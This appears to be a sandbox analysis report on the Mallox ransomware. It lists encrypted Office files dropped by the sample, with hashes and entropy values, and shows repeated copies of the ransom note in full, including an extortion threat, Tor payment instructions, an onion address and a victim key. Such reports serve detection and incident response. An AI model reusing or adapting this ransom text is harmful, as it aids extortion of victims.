                    Preview:.Yl...2...BD..&F.t..Q....m..C.x..Db.p.<.G36;....X.y.ll.C...$...p..:...1..|7..\$..nP...D...;.......Uec.<.....1Y0.7.F9.G...3q.}f....AXo....ZIR+...CB.3...N.@vNs.V.!.).>.....b.E......\.{... hD...Z2..WC..~.xu*.....H.~..0b..>.g.m.'...6......,.Z.:..|m.....7.g.5..5q...(...%....*.DM+.n.z:......K...`../f.E.P._;..d....,...'..lV....0!...U".P...a..x.p<....X.......4e...Z....d.-......2.v"SU......)".D=-..G....V..6.^;$.>........Z.U..Y...!.YJ.:_....c.1....$"..,Uv&......h...#..du...I...ujQ....WE...W;u..=@.j..s..S....b.J..Q.v........b...yS......u$.V.<.....D...U....7,..Ff^....$4![v.J.U..k.$..?....D.P..J;.BdSg.\.;..9UB.K.w..!;.R.K:P..,..|..k4...7@.....c.d..ES...4/......a........j.>Z...).~x......5..u..[...Z.pz..a:.So..r..R..`.....Rm.:.v.1..y....+...EV .-:.u..df>..'o5.N.:...U..*..Nm...z{.-=.Q.%Q^a.*..oy...."Z.VI}9.s2.4..1..|ju..j'..&x?.Z.x.- ....eyN....7Z.....>.)&/..0~..(.gz...}....H....S1\...N`.4Rb..D.T-.X|1...r......Q.(D..}.A..Q=..c..l......1..U..C...>,...@..

                    C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000051\dist\en-us_web\taskpanev2.js.map.gz

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):358562
                    Entropy (8bit):7.999502381704687
                    Encrypted:true
                    SSDEEP:6144:TW+I86A5vUPvaWIS2dVTWOTvWKXyO/i0kxfzjoUW58YEMJdyp3lH:TxInA5vUPv1ETWOTe5Qi0ifA1+1H
                    MD5:FE1DD401FEBC0161DA931F1C5AF1D80F
                    SHA1:9AEA2211495AEAD962FB81D82C9A209955D1F229
                    SHA-256:A7793E7A7E4002CAFD60CC68CB76653EFF2BFB87BCB52609F1C808189BB3AA94
                    SHA-512:86DE27C00440D9A9F3F43A0833BC07F8510A98A3C16AE217E54001678415284EFEF60336E29A0A7BAB91203574F16A785141DD551532071DA32AE11F4D00C7F4
                    Malicious:true
                    Preview:...ek...c..:.....o...&.x4.f6}.{Q...]XB021..s.....4G...?...f...%...u.c..\.9.a...ZJ..d....f{...d:/.M*....<...<..k..).E..$+V....6...@Ip...@G.E&.....1Q..|...q....2...S..6{[... SX.....G.)q....M..!.......&...>..6.....I....7kx..../.y......T..+.4B....#...C.,..V+.G.&l..5..,. ..`.9fBd.ao.....~..b1...z&.h2.......n...e.AGt=U.o<dPJ.......qs.....s.?t.....D......u.. ....iv..:...........\R%E.........*.Q./j...e...6....V....W..=.}j..<...+.x.t...Os.?Q...../..LY.....(.Oe(....J.x.>.|.h.yg.q..U..h.R......D....O.........D.N{.............v.Y..d.G.,....G..:...@.9j...Y..=.5.wh..7p!.]...b..s.\.n....u...f.^oBh.....[.Tm.K.....X...10.J..0.....q.k_}.<._....Q*g.VL!.D..5@.)lJ.}f.I?j^....B1.U..z.!.1^..u.`.S..(......;..}.&8.S.}..gY..iE..]..8.8=.h.......?.....km0.....J...v...F.K.E.W...[...]...(.?t.5.P...S.YZ.5+..v;.AV....Q5.J.4.l3..q.X.(Q.cV..U....9...)...-.i.F..5...#:.7...vT..'...b.mk3.........+UB....L...[...Tu.;M.p..m......R.l....G0.Fs.O..c..0.9.n.!F.7.

                    C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000051\dist\en-us_web\vendor.js.gz

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):243314
                    Entropy (8bit):7.999155017097274
                    Encrypted:true
                    SSDEEP:6144:0yonZiJqET3pfuegMaYlQg8QOlbSetdHLA23Vx:wnwJ31HRDQbSetdH/3Vx
                    MD5:64415060E5C045F1484A3D127BE9A571
                    SHA1:1B2B8E9AB0BBA438E0BFB7E9C1B5A338D6CFA5CA
                    SHA-256:FE45E7E97E0529EA131038D52A38D2A6CFD3A907AA6F2530C4470B9CDE25F850
                    SHA-512:AC5FA0F22497D0913BB9DCA73BCAEBBE7CDACA5F4F8763F0D412DC95165FDAC463E332D03C783F896333BDF5BB0A49468970FCEE5B82DE0E44928B1CA938B104
                    Malicious:true
                    Preview:..36..6.++....(._.V.K.J....$....f...56S.f.T.0......4..1.....|r..o<...m........?.J.P:.c_.R.M...[.n..J.^6?q8...-...^....r*o.W*.Ev...R.b[....22%M'.F5.m.X./4..I.......L.......$...s.+].*..3M.>..1....."........;v/..y?.q3gn.`a5.J..88;.....q.3....f.F...OKw=.=....r......B.h...m..V".=*.xM....E~........t..?^.F.>.x...I...-.Mt.....3y~.~.oD.^..'...._...j.kK#.."W..Lzv.WA.....%.+B]..K..i.......}P.&..&..u .....hw....H......s...X.HS.@a.-.T23.g......~..C.X6.H..X..~X.\.+.......Z...&....f|/.).}....y ..>.g..?9."..}..!.G9LD.|.!sv.P4:.;..h........P.}jy..s.|.&.....!..7.....L...o^.o..Y..+...|..G.NW............N:T..+/o;&q$h...K,.Q.D.......]..#.XFQ.d..."(.(8.gd.s...89..D.J,.J...3.u}8.{.]..Y......>.h.J!...oK=..t....xY..-.g&w3...a.gD...Om{.Aa..G....r.%%.0'.....~A.+..58k...g.:!E.W.G.Cf.X..d.C....[..[.Y.$.LE..2}.R:"..rTt-.X.#d.*.? ......_.{........PHl..us.'.Ba......"...'7&.....%....q..D7.m./..D...jq..n7uVX.F.^.1...#.)..4......~....h.MB.TNx...N..:L..m..rx...*B......

                    C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000051\dist\en-us_web\vendor.js.map.gz

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):811231
                    Entropy (8bit):7.999746169469016
                    Encrypted:true
                    SSDEEP:24576:o0A0yzHHv7qsIN9V0JsxjODdAqCZc/mJ2:o08zHv74zosjODiqCq+8
                    MD5:35F176EF07785FDE18A28A5791ADEEE6
                    SHA1:B5050B484D750E2889A9A52D1F5BAAEE595AD5E7
                    SHA-256:8E01A6BE244339F3C43368A14199BE9C514E6F2DD2DB7CE3FDE9B06A8E8A24F0
                    SHA-512:6DF4C109D216009C09AC37EBA191602F947F31E9E6316DED26048AD6FD5A16D5A13782F3E143CB5746A62B2485CEF856977B48B6401FAD097BCAB9D346CEDEC5
                    Malicious:true
                    Preview:..I........V.}.VfS..8...... .......f.A{..FC....\V...bz..trv..B.[..l}\.;l...C$..:..^..V..d._9.B..SK2>Q.!...B.........h.+..].M... f&.[.f.L.}...C..0WIa..}..j..8'8....Y.+.......C....W9....h...v..._m.<.A... a..>Pb...gZ.._....dJ.z.gW.4..^...(.ks..s.+.>2IP{.....)....(>.W....@..L.>En.J9.....sI....\....F..y.yj..>B.<....".y.V.Ar.h.S.?@.A.....E......5d2....lr1... .9i....n.|.= m`..gc..n3....$:w....."X"Hc..]b...Y9..#.....CIy)*.Y..M.1...n.`.....:..i..]....hs...+..y.c..I.]\ xV.5..'....gYn.u.e%H.B.]..2?. 6....9.t....L".+....>.Sx....W&.."(...[..*....r..Z.....y_..5Y.pT."~....M. .n.8..A.*.W....YH.../~.......'.+.1.......i........1.....Lz..Ic.r..".......A.W...Nv..p.*...3....K.Lk.....B2...?.Q(E..{.4.........4..%-(v..2T...A...~|P.....Q...e.T...*}. .q.....q.p9..E.pb.....BI'..!..+k.r.....c.....1.....r..h..0......^f..ST'0.......$. ..E...H.Q..QV.w..._.U..A.-.. .2.......{.s.....\ .".[...#S._s.............X"0...s...,...aI..h.2...].h.....u._.^v.W.....}*gOsK.eu..YC.

                    C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000109\dist\taskpane.js.gz

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):451885
                    Entropy (8bit):7.999530286202199
                    Encrypted:true
                    SSDEEP:12288:0GneWQOL1ufRNN0oO+2CNE48zxjOdR0U/y/Q6IfX8pIiBt:SnYCRNN0oO+2CNEbMdRba/RIUBBt
                    MD5:3B9E49481CF610AC126A3B590AA650BE
                    SHA1:4E394322975065C08E2EED852699909F59E02796
                    SHA-256:6FD4822D40019602BCCFF87D18B98D1F259480AA35652ADAFB1BB2417E28A8F0
                    SHA-512:125C5F11F2C3E358A3C9E51E68253AB4F6C34761B01B08097C31727CB9A4C0C60BE6BC11C1990431AA3B4CA3C31C4631BCF6ECFEBE9C05A77B8B837C9F57B450
                    Malicious:true
                    Preview:F..B....'...,.4mo..m.'T..h@S6.h .......~.....$..,UnX.<N.c.w.....bs8...F..KB...&.,...R.._..N....7.../..P....T........4U}....#..|..nr...........`.F...M...w+L...[.K..u...j....H.xF.....Ra..21.V..SQ....%.......g.zH..............7}..3Mg.f87e...2..O......<(.d..e [.r....yW.T..>t.S.ln.Q4..);...X$...]M..a.....x..>.5b....x..;f.*~d8....El.._"....T.....jLI8..X.A@..v.......M.......$.....(W..~.h.E.$.l.w}.*.ai:.n.....7..0...-..a.%-.!..e.D-CG....@....{,.k..dh...,...x.O.<YT.m.ct...&...tB.*K..KeI...NL..H...v..f..+...i5w........o......O,...*.T...5.G,.F.y...mG......G....6.-.b..............Q.x..l..).5].i^a..k...&......g....K...h...Z..'TQ.|..].b.?..'rM.. 4..3ux...M(L....E#&.D)By.%..53..%O_..JV ...0_.h....jlBN.JW]h......../.t...G'...E....=Y.wG..X..+1U....3*...bc.w......+b.......L.3z....U..... +.....Z.p.H.Gf......a.....U|.Kw.@...+..5v).3..{fx{...[..........T.I.....B-.N..\.D.6...$.....!.CQ.f....+.F.@..-9...-,.%.o.%I#..x.h..h..1~.Ss.A`:..E|..nR1...6Y$U.".."j.X..v.8

                    C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000109\dist\taskpane.js.map.gz

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1707100
                    Entropy (8bit):7.999885649641851
                    Encrypted:true
                    SSDEEP:49152:5I2TbTm1z8ejPb9lmNMhqgXBGAkDPRvHkYx/:1TYvPbfOPgXBGA+5HkE
                    MD5:F92A8674E3AEDF6EEACE074168C2DD14
                    SHA1:0F2EAA9DD9B77C8346EEFF566FD9157E590AFB1F
                    SHA-256:1E385AE5A11780E18FFB071401AADAB3E368DECC2FAA9E04877DA003626E3C4C
                    SHA-512:AC9D0DDFAAA8EF5100671E9923393A56CE9DF655E94FD86B3ED1C8E1BF88CBD8620AE5490F52D4225C7C5FC4CC8AF8CC3BD70DA51B021FFD5042F921CE3D0ED9
                    Malicious:true
                    Preview:M.R.........^..\..MX.....o~},k._.Z..A..n;..m/.>b..A.U..8W..1.hiW.9........L.........N7B.7&![.9-z....w9........w.....)P7n.".e.U>UD..(&#{...a.n@:...m.4.?..A..%&../;.r.5.r.b1y.~..y>.....v&...k......8..j..A..Pu...I...#.[.hk5r.y...;g......:.r.[..b....ba.A.h..ZL...9....mz"..!.h.....E*.gZV....j..z..,.k]..=l..v..,...HU.o(z@~.........<s...qE/.<~......S.Rp.......Zf.VUU...u|Y2t.n;....f..'.Y.P......>.q.......n....^@^....X.L.&...7.f^....9O...S..l.%... 7v..SYX{.E3.i...Q....D...0...]?.....{%k..\.}..G..,.M....;!.......l.i.*...{Ov.I..)..c@.....t.6.}...t:v~t...^,..|.%Wr....7.>.&..ZzE.....|x..0..d..R-H..5.f....M1E.|7S...\Y.6..e..opP...+(...@.!..x"...e..._.;...q=r(w.S.}.x..8.............G.........-...............g[[p.}.P3.Q...3{.dALO.]....]..._..E..I.p0.`.g..Q..5P....>.=.d....y.u..?..K.+..M......1.?.<...U.D..&.43*...".!.$}.+......7x7..r..=.~z'lm.02..*..&7.....@..I..&.d.c.?s0^g(.v..g."... ..=....G..`^u....k\.0<|7...mZ.....E.o....Uy..4.t....w.

                    C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000109\dist\vendor.js.gz

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):42600
                    Entropy (8bit):7.995598775268765
                    Encrypted:true
                    SSDEEP:768:fxeseAAL8rlpPQkn9WgSdPASvra+MY6gDrAi7GOBtm6bkze/2cSfJR8i53WDD:fgseAZZ4fdvCvgFG6jIS/2cQCixu
                    MD5:C75DECB7D9DC7A6C45140BC7B14D2A60
                    SHA1:3EA04FD5DC73AB715A194E026A5F0D07E8C89605
                    SHA-256:C3D2556EFCCF2066AE68339D9C8C8912408E54AAE127874CC44A1B2EE490CB55
                    SHA-512:CDA761C3BBDE2B2AAB1C12B84EC7A6C4F81A1C86019D7E5951710E3AD8B4230DCB397F6112D10089B6B63C384B0609E071C45FA401562E77137EA43B57D0D366
                    Malicious:true
                    Preview:@*...^.c....F+..!.zQ.:.|.......p*t.5A...V4.s.F.M..J.*M...b....('9.9$. ....tPj..q...t&....3..4...Q.....&3G6u....I.CZ....mz.i.L......{1``p.V..;._..\w'......4U..........1ys..}>.J....)q..vNR....m.s....Z.~%t..U..%vx.d..}..=."61...5B......=~K.N..c?9h{.A.{k....H..A.S.B?.=..."...H.=js.$..-.-....^.K._.hv..lA.K)cl..U....."..x..d.If#P..M=.l.o.."..h..G.$D.{T..O.0......^.8...z...n.H.q.+x...0.....!#...fa{B...t..G{..j{c.x1;..@H.j.9zT.9...:..N.."..X.m'..e....I|N.|.)....T..&..\n........'.S.!.nz..6_A:^..?"...u....q....8......`.tXm....>...M...f.B,<.'...!w...g?..-..e.}..>)...?:.............H..N.....yA!.."...1`........Ja.&m.C.`.U..../&...;PPB.V.uEK.E0...S..M55._....^..zh.v.IU...5...*.~.y.S.W=[~......i+...41bN?:.:+..r.o....>..C...~U....B..SnA...8..Yb..r........7...{F.T.]hd..&.....]<.x.J4.Z.NV1{G)....|..z+......d...B......&.cu..~..>q......@o..[.e...xJ8.o..0K8.<.BV....x.p^..`.p.W...........^..Lw.........B....~IG..}b.'.=...6...%.JO..B<..K..J.....*..3Z.A.P..".rD...'.....Z

                    C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000109\dist\vendor.js.map.gz

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):98826
                    Entropy (8bit):7.9983048800655325
                    Encrypted:true
                    SSDEEP:1536:idCLqxAl19iwVuB9/YaJfsRYErRGmANUDI/iZCaIr1ZA53ya59ziSMzPUseL6w:vqxO1gJBuaQRGdbKZVIr1ZUiOssb
                    MD5:2E71D31EAFCBB2DFFACF4D60024EEC00
                    SHA1:591CE98C3780E2410AFF1356E48B41DE87BF0E94
                    SHA-256:1C2D5D9CD9D622A458907E3DFE4739194B66B5DA8A2D3A5C7B713D7D821F2A9D
                    SHA-512:8CD28786E5E7879592E729B3C4C69ED7AF39B23D5E96C3EE53DF07B602E0479C1EBCD18FF8149FEB244A749718842EFECCCEB25F677B710769123D8AC60F533D
                    Malicious:true
                    Preview:.p_.r..u}.@.P_....x..<.......s.!..O..O..~.9.....*....y..iOH.uB..%d8....Z....p]...[.=0..r...VYU.'..rT..r......K.c.r../.......r.c..k;.j.],..O....3.T.......f.R..>..{+.A.a..^}.Z..#.zJq..uo..b%..........i.?.C....O1..z.....q.l,rS.D.~f..2..1,Nf..E>....zB&.....,h..d\..d.a......I.S..).K...MX....$k.]...I......!^.b...ty......s.W..T`...EX.{J...b.S..cF...J.uV..e.......U.cS.\....&.ni_.......s.<.6..o..@.,..xm.L.....:..*.f....Zk?.Q.`.t\hj`...C&U+W....Q...f.4......`....F#"@F.f.%..Gz"...14F"..k.V....X..x5..Wx.FH...G=....!\..r..H6.d.j....Z..a&.d5'2TU..l..:...tGo.J5......@L...0?.'{.P...~..#.}..../."..(..-......J.}..:.x.D...{..n|.........vS..;a...y3.3.V\.GD.X......p..*...t.S..m.L.~....g..M....LC....K.|/+%'........Q..E.c.I........b=z..=...a./.2..Ate.b.OQz...3s>...@..2......[.. ..Y....`O..H*.E.....qCE......`"'bp....I..H.....r......v.."..Y.v/&#t....P.}#.QDF...#.....K~..Jn.....k.zH.M.d..O.....z.'(....^...bW........9....OY#=o74CN4...Xgb/...?.WK..r;...O

                    C:\Program Files (x86)\Reference Assemblies\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\RedistList\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\SubsetList\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\SubsetList\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Program Files (x86)\Reference Assemblies\Microsoft\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
